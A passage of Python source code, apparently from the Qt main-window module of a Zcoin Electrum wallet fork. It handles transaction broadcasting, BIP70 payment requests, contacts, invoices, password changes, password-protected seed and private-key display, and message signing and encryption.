    Also settles any pending BIP70 payment request (marks it paid and sends
    the payment ACK to the merchant).
    """
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Payment request has expired")
        status = False
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            msg = e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            msg = repr(e)
        else:
            status, msg = True, tx.txid()
        if pr and status is True:
            # Mark the invoice paid and notify the merchant (BIP70 ACK).
            self.invoices.set_paid(pr, tx.txid())
            self.invoices.save()
            self.payment_request = None
            refund_address = self.wallet.get_receiving_address()
            coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            ack_status, ack_msg = fut.result(timeout=20)
            self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
        return status, msg
    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
    def broadcast_done(result):
        # GUI thread
        if result:
            status, msg = result
            if status:
                if tx_desc is not None and tx.is_complete():
                    self.wallet.set_label(tx.txid(), tx_desc)
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
                self.do_clear()
            else:
                msg = msg or ''
                parent.show_error(msg)
    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
    """Modal dialog asking the user to pick one of *choices*.

    Returns the selected index, or None if the dialog was dismissed.
    """
    # Needed by QtHandler for hardware wallets
    dialog = WindowModalDialog(self.top_level_window())
    clayout = ChoicesLayout(msg, choices)
    vbox = QVBoxLayout(dialog)
    vbox.addLayout(clayout.layout())
    vbox.addLayout(Buttons(OkButton(dialog)))
    if not dialog.exec_():
        return None
    return clayout.selected_index()
def lock_amount(self, b):
    """Freeze the amount editor when *b* is true; Max follows inversely."""
    self.max_button.setEnabled(not b)
    self.amount_e.setFrozen(b)
def prepare_for_payment_request(self):
    """Lock the Send tab while a BIP70 payment request is being fetched."""
    self.show_send_tab()
    self.payto_e.is_pr = True
    for field in (self.payto_e, self.message_e):
        field.setFrozen(True)
    self.lock_amount(True)
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoice(self, key):
    """Remove the invoice stored under *key* and refresh the list view."""
    self.invoices.remove(key)
    self.invoice_list.update()
def payment_request_ok(self):
    """Populate the Send tab from a successfully verified payment request."""
    pr = self.payment_request
    if not pr:
        return
    key = self.invoices.add(pr)
    status = self.invoices.get_status(key)
    self.invoice_list.update()
    if status == PR_PAID:
        self.show_message("invoice already paid")
        self.do_clear()
        self.payment_request = None
        return
    self.payto_e.is_pr = True
    # Green styling while the request is valid, expired styling otherwise.
    if not pr.has_expired():
        self.payto_e.setGreen()
    else:
        self.payto_e.setExpired()
    self.payto_e.setText(pr.get_requestor())
    self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
    self.message_e.setText(pr.get_memo())
    # signal to set fee
    self.amount_e.textEdited.emit("")
def payment_request_error(self):
    """Show the failed payment request's error and reset the Send tab."""
    pr = self.payment_request
    if not pr:
        return
    self.show_message(pr.error)
    self.payment_request = None
    self.do_clear()
def on_pr(self, request):
    """Store an incoming payment request and emit the matching signal."""
    self.payment_request = request
    verified = self.payment_request.verify(self.contacts)
    signal = self.payment_request_ok_signal if verified else self.payment_request_error_signal
    signal.emit()
def pay_to_URI(self, URI):
    """Fill the Send tab from a BIP21 payment URI.

    If the URI carries a payment-request reference ('r', or name+sig),
    the tab is locked until the request resolves via self.on_pr.
    """
    if not URI:
        return
    try:
        out = util.parse_URI(URI, self.on_pr)
    except InvalidBitcoinURI as e:
        self.show_error(_("Error parsing URI") + f":\n{e}")
        return
    self.show_send_tab()
    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    if r or (name and sig):
        # A payment request will be fetched asynchronously; lock the form.
        self.prepare_for_payment_request()
        return
    address = out.get('address')
    amount = out.get('amount')
    label = out.get('label')
    message = out.get('message')
    # use label as description (not BIP21 compliant)
    if label and not message:
        message = label
    if address:
        self.payto_e.setText(address)
    if message:
        self.message_e.setText(message)
    if amount:
        self.amount_e.setAmount(amount)
        self.amount_e.textEdited.emit("")
def do_clear(self):
    """Reset the Send tab to its pristine state (fields, fee, coin choice)."""
    self.max_button.setChecked(False)
    self.not_enough_funds = False
    self.payment_request = None
    self.payto_e.is_pr = False
    for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
              self.fee_e, self.feerate_e]:
        e.setText('')
        e.setFrozen(False)
    # Back to slider-driven fee selection with the configured default rate.
    self.fee_slider.activate()
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.size_e.setAmount(0)
    self.feerounding_icon.setVisible(False)
    self.set_pay_from([])
    self.tx_external_keypairs = {}
    self.update_status()
    run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
    """(Un)freeze *addrs* in the wallet and refresh the affected views."""
    self.wallet.set_frozen_state_of_addresses(addrs, freeze)
    for view in (self.address_list, self.utxo_list):
        view.update()
    self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
    """(Un)freeze *utxos* in the wallet and refresh the coin view."""
    self.wallet.set_frozen_state_of_coins(utxos, freeze)
    self.utxo_list.update()
    self.update_fee()
def create_list_tab(self, l, toolbar=None):
    """Wrap list widget *l* (plus an optional toolbar) in a tab container."""
    w = QWidget()
    # Expose the list for the status-bar search box.
    w.searchable_list = l
    vbox = QVBoxLayout()
    w.setLayout(vbox)
    vbox.setContentsMargins(0, 0, 0, 0)
    vbox.setSpacing(0)
    if toolbar:
        vbox.addLayout(toolbar)
    vbox.addWidget(l)
    return w
def create_addresses_tab(self):
    """Build the Addresses tab, restoring toolbar visibility from config."""
    from .address_list import AddressList
    self.address_list = l = AddressList(self)
    l.setObjectName("addresses_container")
    toolbar = l.create_toolbar(self.config)
    toolbar_shown = self.config.get('show_toolbar_addresses', False)
    l.show_toolbar(toolbar_shown)
    return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
    """Build the Coins (UTXO) tab."""
    from .utxo_list import UTXOList
    utxo_list = UTXOList(self)
    utxo_list.setObjectName("utxo_container")
    self.utxo_list = utxo_list
    return self.create_list_tab(utxo_list)
def create_contacts_tab(self):
    """Build the Contacts tab."""
    from .contact_list import ContactList
    contact_list = ContactList(self)
    contact_list.setObjectName("contacts_container")
    self.contact_list = contact_list
    return self.create_list_tab(contact_list)
def remove_address(self, addr):
    """Delete *addr* from the wallet after user confirmation."""
    prompt = _("Do you want to remove {} from your wallet?").format(addr)
    if not self.question(prompt):
        return
    self.wallet.delete_address(addr)
    self.need_update.set()  # history, addresses, coins
    self.clear_receive_tab()
def get_coins(self):
    """Return the manually selected coins, else all spendable wallet coins."""
    return self.pay_from or self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
    """Select *coins* as transaction inputs and open the Send tab."""
    self.set_pay_from(coins)
    self.show_send_tab()
    self.update_fee()
def paytomany(self):
    """Switch to the Send tab in multi-output (pay-to-many) mode."""
    self.show_send_tab()
    self.payto_e.paytomany()
    instructions = [
        _('Enter a list of outputs in the \'Pay to\' field.'),
        _('One output per line.'),
        _('Format: address, amount'),
        _('You may load a CSV file using the file icon.')
    ]
    self.show_message('\n'.join(instructions), title=_('Pay to many'))
def payto_contacts(self, labels):
    """Fill the Send tab's payto field from the given contact labels."""
    paytos = [self.get_contact_payto(label) for label in labels]
    self.show_send_tab()
    if len(paytos) == 1:
        self.payto_e.setText(paytos[0])
        self.amount_e.setFocus()
    else:
        # Multiple recipients: one "payto, 0" line each.
        lines = ["{}, 0".format(p) for p in paytos]
        self.payto_e.setText("\n".join(lines))
        self.payto_e.setFocus()
def set_contact(self, label, address):
    """Add or rename a contact; return True on success, False if invalid."""
    if not is_address(address):
        self.show_error(_('Invalid Address'))
        self.contact_list.update()  # Displays original unchanged value
        return False
    self.contacts[address] = ('address', label)
    for view in (self.contact_list, self.history_list):
        view.update()
    self.update_completions()
    return True
def delete_contacts(self, labels):
    """Remove *labels* from contacts after a single confirmation prompt."""
    joined = " + ".join(labels)
    if not self.question(_("Remove {} from your list of contacts?").format(joined)):
        return
    for label in labels:
        self.contacts.pop(label)
    self.history_list.update()
    self.contact_list.update()
    self.update_completions()
def show_invoice(self, key):
    """Look up invoice *key*, re-verify it, and display its details."""
    pr = self.invoices.get(key)
    if pr is None:
        self.show_error('Cannot find payment request in wallet.')
        return
    pr.verify(self.contacts)
    self.show_pr_details(pr)
def show_pr_details(self, pr):
    """Show a modal dialog with the details of payment request *pr*,
    offering export to a .bip70 file and deletion of the stored invoice."""
    key = pr.get_id()
    d = WindowModalDialog(self, _("Invoice"))
    vbox = QVBoxLayout(d)
    grid = QGridLayout()
    grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
    grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
    grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
    outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
    grid.addWidget(QLabel(outputs_str), 1, 1)
    expires = pr.get_expiration_date()
    grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
    grid.addWidget(QLabel(pr.get_memo()), 2, 1)
    grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
    grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
    if expires:
        grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
        grid.addWidget(QLabel(format_time(expires)), 4, 1)
    vbox.addLayout(grid)
    def do_export():
        # Save the raw BIP70 payment request under a sensible default name.
        name = str(key) + '.bip70'
        fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
        if not fn:
            return
        with open(fn, 'wb') as f:
            f.write(pr.raw)
        # BUGFIX: keep the filename outside the translation lookup.
        # _('Invoice saved as' + ' ' + fn) built a msgid containing the
        # filename, which can never match any translation catalog entry.
        self.show_message(_('Invoice saved as') + ' ' + fn)
    exportButton = EnterButton(_('Save'), do_export)
    def do_delete():
        if self.question(_('Delete invoice?')):
            self.invoices.remove(key)
            self.history_list.update()
            self.invoice_list.update()
            d.close()
    deleteButton = EnterButton(_('Delete'), do_delete)
    vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
    d.exec_()
def do_pay_invoice(self, key):
    """Load stored invoice *key* into the Send tab and re-verify it."""
    pr = self.invoices.get(key)
    self.payment_request = pr
    self.prepare_for_payment_request()
    pr.error = None  # this forces verify() to re-run
    handler = self.payment_request_ok if pr.verify(self.contacts) else self.payment_request_error
    handler()
def create_console_tab(self):
    """Build the Console tab widget."""
    from .console import Console
    console = Console()
    console.setObjectName("console_container")
    self.console = console
    return console
def update_console(self):
    """Populate the console namespace with wallet objects and RPC commands."""
    console = self.console
    console.history = self.config.get("console-history",[])
    console.history_index = len(console.history)
    console.updateNamespace({
        'wallet': self.wallet,
        'network': self.network,
        'plugins': self.gui_object.plugins,
        'window': self,
        'config': self.config,
        'electrum_xzc': electrum_xzc,
        'daemon': self.gui_object.daemon,
        'util': util,
        'bitcoin': bitcoin,
    })
    # Expose every public command as a console function.
    c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
    methods = {}
    def mkfunc(f, method):
        return lambda *args: f(method, args, self.password_dialog)
    for m in dir(c):
        if m[0]=='_' or m in ['network','wallet','config']: continue
        methods[m] = mkfunc(c._run, m)
    console.updateNamespace(methods)
def create_status_bar(self):
    """Build the status bar: balance label, search box, and action buttons."""
    sb = QStatusBar()
    sb.setFixedHeight(35)
    self.balance_label = QLabel("Loading wallet...")
    self.balance_label.setObjectName("main_window_balance")
    self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
    self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
    sb.addWidget(self.balance_label)
    # Hidden search box, toggled via toggle_search().
    self.search_box = QLineEdit()
    self.search_box.textChanged.connect(self.do_search)
    self.search_box.hide()
    sb.addPermanentWidget(self.search_box)
    self.update_check_button = QPushButton("")
    self.update_check_button.setFlat(True)
    self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
    self.update_check_button.setIcon(read_QIcon("update.png"))
    self.update_check_button.hide()
    sb.addPermanentWidget(self.update_check_button)
    self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
    sb.addPermanentWidget(self.password_button)
    sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
    self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
    sb.addPermanentWidget(self.seed_button)
    self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
    sb.addPermanentWidget(self.status_button)
    self.dash_net_button = StatusBarButton(read_QIcon('dash_net_0.png'), _("Dash Network"), lambda: self.gui_object.show_dash_net_dialog(self))
    self.dash_net_button.hide()
    self.update_dash_net_status_btn()
    sb.addPermanentWidget(self.dash_net_button)
    run_hook('create_status_bar', sb)
    self.setStatusBar(sb)
def update_lock_icon(self):
    """Show a locked/unlocked padlock matching the wallet password state."""
    icon_name = "lock.png" if self.wallet.has_password() else "unlock.png"
    self.password_button.setIcon(read_QIcon(icon_name))
def update_buttons_on_seed(self):
    """Sync seed/password/send controls with wallet capabilities."""
    self.seed_button.setVisible(self.wallet.has_seed())
    self.password_button.setVisible(self.wallet.may_have_password())
    # A watching-only wallet cannot sign, so hide the send button.
    watching_only = self.wallet.is_watching_only()
    self.send_button.setVisible(not watching_only)
def change_password_dialog(self):
    """Change, set, or disable the wallet password.

    Hardware wallets whose storage is encrypted with an xpub-derived
    key get a dedicated dialog: the effective password comes from the
    device, not from user input.
    """
    from electrum_xzc.storage import STO_EV_XPUB_PW
    if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
        from .password_dialog import ChangePasswordDialogForHW
        d = ChangePasswordDialogForHW(self, self.wallet)
        ok, encrypt_file = d.run()
        if not ok:
            return
        try:
            hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
        except UserCancelled:
            # User aborted on the device; nothing to report.
            return
        except BaseException as e:
            self.logger.exception('')
            self.show_error(str(e))
            return
        # The device-derived password acts as old and/or new password
        # depending on the current encryption state and user choice.
        old_password = hw_dev_pw if self.wallet.has_password() else None
        new_password = hw_dev_pw if encrypt_file else None
    else:
        from .password_dialog import ChangePasswordDialogForSW
        d = ChangePasswordDialogForSW(self, self.wallet)
        ok, old_password, new_password, encrypt_file = d.run()
        if not ok:
            return
    try:
        self.wallet.update_password(old_password, new_password, encrypt_file)
    except InvalidPassword as e:
        self.show_error(str(e))
        return
    except BaseException:
        self.logger.exception('Failed to update password')
        self.show_error(_('Failed to update password'))
        return
    msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
    self.show_message(msg, title=_("Success"))
    self.update_lock_icon()
def toggle_search(self):
    """Show or hide the status-bar search box.

    When showing, move keyboard focus into the box; when hiding, clear
    the active filter so the current tab shows all rows again.
    """
    # Removed: unused local `tab` and commented-out searchable_list
    # toolbar experiment (dead code).
    self.search_box.setHidden(not self.search_box.isHidden())
    if not self.search_box.isHidden():
        self.search_box.setFocus(1)
    else:
        self.do_search('')
def do_search(self, t):
    """Filter the current tab's list by text *t*, if that tab has a
    `searchable_list` attribute; otherwise do nothing."""
    searchable = getattr(self.tabs.currentWidget(), 'searchable_list', None)
    if searchable is not None:
        searchable.filter(t)
def new_contact_dialog(self):
    """Prompt for an address and a name; store them as a contact on OK."""
    d = WindowModalDialog(self, _("New Contact"))
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_('New Contact') + ':'))
    grid = QGridLayout()
    addr_edit = QLineEdit()
    name_edit = QLineEdit()
    for edit in (addr_edit, name_edit):
        edit.setFixedWidth(32 * char_width_in_lineedit())
    grid.addWidget(QLabel(_("Address")), 1, 0)
    grid.addWidget(addr_edit, 1, 1)
    grid.addWidget(QLabel(_("Name")), 2, 0)
    grid.addWidget(name_edit, 2, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if d.exec_():
        # set_contact expects (name, address).
        self.set_contact(name_edit.text(), addr_edit.text())
def show_master_public_keys(self):
    """Show the "Wallet Information" dialog: file name, wallet type,
    script type, seed availability, keystore type, and — for
    deterministic wallets — the master public key(s)."""
    dialog = WindowModalDialog(self, _("Wallet Information"))
    dialog.setMinimumSize(500, 100)
    mpk_list = self.wallet.get_master_public_keys()
    vbox = QVBoxLayout()
    wallet_type = self.wallet.storage.get('wallet_type', '')
    if self.wallet.is_watching_only():
        wallet_type += ' [{}]'.format(_('watching-only'))
    seed_available = _('True') if self.wallet.has_seed() else _('False')
    keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
    grid = QGridLayout()
    basename = os.path.basename(self.wallet.storage.path)
    grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
    grid.addWidget(QLabel(basename), 0, 1)
    grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
    grid.addWidget(QLabel(wallet_type), 1, 1)
    grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
    grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
    grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
    grid.addWidget(QLabel(str(seed_available)), 3, 1)
    # With several keystores the type is shown per-cosigner below.
    if len(keystore_types) <= 1:
        grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
        ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
        grid.addWidget(QLabel(ks_type), 4, 1)
    vbox.addLayout(grid)
    if self.wallet.is_deterministic():
        mpk_text = ShowQRTextEdit()
        mpk_text.setMaximumHeight(150)
        mpk_text.addCopyButton(self.app)
        def show_mpk(index):
            # Put the selected master public key into the QR text box.
            mpk_text.setText(mpk_list[index])
            mpk_text.repaint() # macOS hack for #4777
        # only show the combobox in case multiple accounts are available
        if len(mpk_list) > 1:
            def label(key):
                if isinstance(self.wallet, Multisig_Wallet):
                    return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
                return ''
            labels = [label(i) for i in range(len(mpk_list))]
            on_click = lambda clayout: show_mpk(clayout.selected_index())
            labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
            vbox.addLayout(labels_clayout.layout())
        else:
            vbox.addWidget(QLabel(_("Master Public Key")))
        show_mpk(0)
        vbox.addWidget(mpk_text)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(dialog)))
    dialog.setLayout(vbox)
    dialog.exec_()
def remove_wallet(self):
    """Ask for confirmation, then delete the wallet file from disk."""
    prompt = '\n'.join([
        _('Delete wallet file?'),
        "%s"%self.wallet.storage.path,
        _('If your wallet contains funds, make sure you have saved its seed.'),
    ])
    if not self.question(prompt):
        return
    self._delete_wallet()
@protected
def _delete_wallet(self, password):
    """Delete the wallet file via the daemon and close this window.

    @protected prompts for the wallet password before running.
    """
    wallet_path = self.wallet.storage.path
    basename = os.path.basename(wallet_path)
    deleted = self.gui_object.daemon.delete_wallet(wallet_path)
    self.close()
    # Both outcomes are reported through show_error, matching the
    # original behaviour.
    if deleted:
        self.show_error(_("Wallet removed: {}").format(basename))
    else:
        self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
    """Display the wallet seed and passphrase after password entry."""
    if not self.wallet.has_seed():
        self.show_message(_('This wallet has no seed'))
        return
    keystore = self.wallet.get_keystore()
    try:
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
    except BaseException as e:
        self.show_error(str(e))
        return
    from .seed_dialog import SeedDialog
    dialog = SeedDialog(self, seed, passphrase)
    dialog.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
    """Open a modal QR-code dialog for *data*; no-op on empty input."""
    if data:
        QRDialog(data, parent or self, title).exec_()
@protected
def show_private_key(self, address, password):
    """Show a dialog with the private key (and redeem script, if any)
    for *address*.  @protected prompts for the wallet password."""
    if not address:
        return
    try:
        pk, redeem_script = self.wallet.export_private_key(address, password)
    except Exception as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    # Script type is derived from the exported key itself for display.
    xtype = bitcoin.deserialize_privkey(pk)[0]
    d = WindowModalDialog(self, _("Private key"))
    d.setMinimumSize(600, 150)
    vbox = QVBoxLayout()
    vbox.addWidget(QLabel(_("Address") + ': ' + address))
    vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
    vbox.addWidget(QLabel(_("Private key") + ':'))
    keys_e = ShowQRTextEdit(text=pk)
    keys_e.addCopyButton(self.app)
    vbox.addWidget(keys_e)
    if redeem_script:
        vbox.addWidget(QLabel(_("Redeem Script") + ':'))
        rds_e = ShowQRTextEdit(text=redeem_script)
        rds_e.addCopyButton(self.app)
        vbox.addWidget(rds_e)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    d.exec_()
# Explanation shown by do_sign when the entered address type does not
# map to a unique public key (see the txin_type check there).
msg_sign = _("Signing with an address actually means signing with the corresponding "
          "private key, and verifying with the corresponding public key. The "
          "address you have entered does not have a unique public key, so these "
          "operations cannot be performed.") + '\n\n' + \
   _('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
    """Sign *message* with the key of *address* (widgets from the
    sign/verify dialog) and write the base64 signature back into the
    *signature* widget.  Signing runs on the wallet thread; @protected
    asks for the wallet password first.
    """
    address = address.text().strip()
    message = message.toPlainText().strip()
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Zcoin address.'))
        return
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    if not self.wallet.is_mine(address):
        self.show_message(_('Address not in wallet.'))
        return
    # Only address types with a single public key can sign messages.
    txin_type = self.wallet.get_txin_type(address)
    if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
        self.show_message(_('Cannot sign messages with this type of address:') + \
                          ' ' + txin_type + '\n\n' + self.msg_sign)
        return
    task = partial(self.wallet.sign_message, address, message, password)
    def show_signed_message(sig):
        try:
            signature.setText(base64.b64encode(sig).decode('ascii'))
        except RuntimeError:
            # (signature) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
    """Verify the base64 signature against the message and address
    taken from the sign/verify dialog widgets."""
    address = address.text().strip()
    message = message.toPlainText().strip().encode('utf-8')
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Zcoin address.'))
        return
    verified = False
    try:
        # b64decode raises on malformed input; treat any failure as a
        # bad signature rather than crashing.
        sig = base64.b64decode(str(signature.toPlainText()))
        verified = ecc.verify_message_with_address(address, sig, message)
    except Exception:
        verified = False
    if verified:
        self.show_message(_("Signature verified"))
    else:
        self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
    """Open the Sign/verify Message dialog, optionally pre-filling the
    address field with *address*."""
    d = WindowModalDialog(self, _('Sign/verify Message'))
    d.setMinimumSize(610, 290)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    address_e = QLineEdit()
    address_e.setText(address)
    layout.addWidget(QLabel(_('Address')), 2, 0)
    layout.addWidget(address_e, 2, 1)
    signature_e = QTextEdit()
    signature_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Signature')), 3, 0)
    layout.addWidget(signature_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Sign"))
    # do_sign/do_verify receive the widgets and read their contents on click.
    b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Verify"))
    b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
    """Decrypt the ciphertext field on the wallet thread and show the
    resulting plaintext in the message field."""
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    cyphertext = encrypted_e.toPlainText()
    def on_decrypted(text):
        try:
            message_e.setText(text.decode('utf-8'))
        except RuntimeError:
            # The Qt widget may already be deleted when the task finishes.
            pass
    task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
    self.wallet.thread.add(task, on_success=on_decrypted)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
    """Encrypt the message field to the given public key and place the
    base64 ciphertext in the encrypted field."""
    plaintext = message_e.toPlainText().encode('utf-8')
    try:
        public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
    except BaseException:
        self.logger.exception('Invalid Public key')
        self.show_warning(_('Invalid Public key'))
        return
    ciphertext = public_key.encrypt_message(plaintext)
    encrypted_e.setText(ciphertext.decode('ascii'))
def encrypt_message(self, address=''):
    """Open the Encrypt/decrypt Message dialog.  If *address* is given,
    pre-fill the public-key field from the wallet."""
    d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
    d.setMinimumSize(610, 490)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    pubkey_e = QLineEdit()
    if address:
        pubkey = self.wallet.get_public_key(address)
        pubkey_e.setText(pubkey)
    layout.addWidget(QLabel(_('Public key')), 2, 0)
    layout.addWidget(pubkey_e, 2, 1)
    encrypted_e = QTextEdit()
    encrypted_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Encrypted')), 3, 0)
    layout.addWidget(encrypted_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Encrypt"))
    # Handlers get the widgets and read/write them when clicked.
    b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Decrypt"))
    b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
def password_dialog(self, msg=None, parent=None):
    """Run a modal password prompt and return the dialog's result."""
    from .password_dialog import PasswordDialog
    if parent is None:
        parent = self
    return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
    """Parse raw transaction text into a Transaction object; on any
    parse failure show an error dialog and return None."""
    from electrum_xzc.transaction import tx_from_str
    try:
        raw = tx_from_str(txt)
        return Transaction(raw)
    except BaseException as e:
        self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
        return
def read_tx_from_qrcode(self):
    """Scan a QR code with the camera; dispatch payment URIs to the
    send tab and raw transactions to the transaction dialog."""
    from electrum_xzc import qrscanner
    try:
        data = qrscanner.scan_barcode(self.config.get_video_device())
    except BaseException as e:
        self.show_error(str(e))
        return
    if not data:
        return
    # if the user scanned a bitcoin URI
    if str(data).startswith("zcoin:"):
        self.pay_to_URI(data)
        return
    # else if the user scanned an offline signed tx
    try:
        # The tx is base43-encoded inside the QR code; decode to hex.
        data = bh2u(bitcoin.base_decode(data, length=None, base=43))
    except BaseException as e:
        self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
        return
    tx = self.tx_from_text(data)
    if not tx:
        return
    self.show_transaction(tx)
def read_tx_from_file(self):
    """Ask the user for a .txn file and parse it into a transaction.

    Returns the parsed transaction, or None if the user cancelled or
    the file could not be read/parsed.
    """
    fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
    if not fileName:
        return
    try:
        with open(fileName, "r") as f:
            contents = f.read()
    except (ValueError, IOError, os.error) as reason:
        error_text = _("Electrum was unable to open your transaction file") + "\n" + str(reason)
        self.show_critical(error_text, title=_("Unable to read file or no transaction found"))
        return
    return self.tx_from_text(contents)
def do_process_from_text(self):
    """Let the user paste a raw transaction and open it in the
    transaction dialog."""
    text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
    if not text:
        return
    tx = self.tx_from_text(text)
    if not tx:
        return
    self.show_transaction(tx)
def do_process_from_file(self):
    """Load a transaction from a user-chosen file and display it."""
    tx = self.read_tx_from_file()
    if not tx:
        return
    self.show_transaction(tx)
def do_process_from_txid(self):
    """Prompt for a txid, fetch the raw transaction from the network,
    and open the transaction dialog."""
    from electrum_xzc import transaction
    txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
    if ok and txid:
        txid = str(txid).strip()
        try:
            # Blocking bridge into the network thread; 10 second timeout.
            raw_tx = self.network.run_from_another_thread(
                self.network.get_transaction(txid, timeout=10))
        except Exception as e:
            self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
            return
        tx = transaction.Transaction(raw_tx)
        self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
    """Export all wallet private keys to a CSV or JSON file.

    Keys are derived on a background thread while the dialog shows
    progress; the file is written only after the user confirms.
    @protected prompts for the wallet password first.
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    if isinstance(self.wallet, Multisig_Wallet):
        self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                          _('It cannot be "backed up" by simply exporting these private keys.'))
    d = WindowModalDialog(self, _('Private keys'))
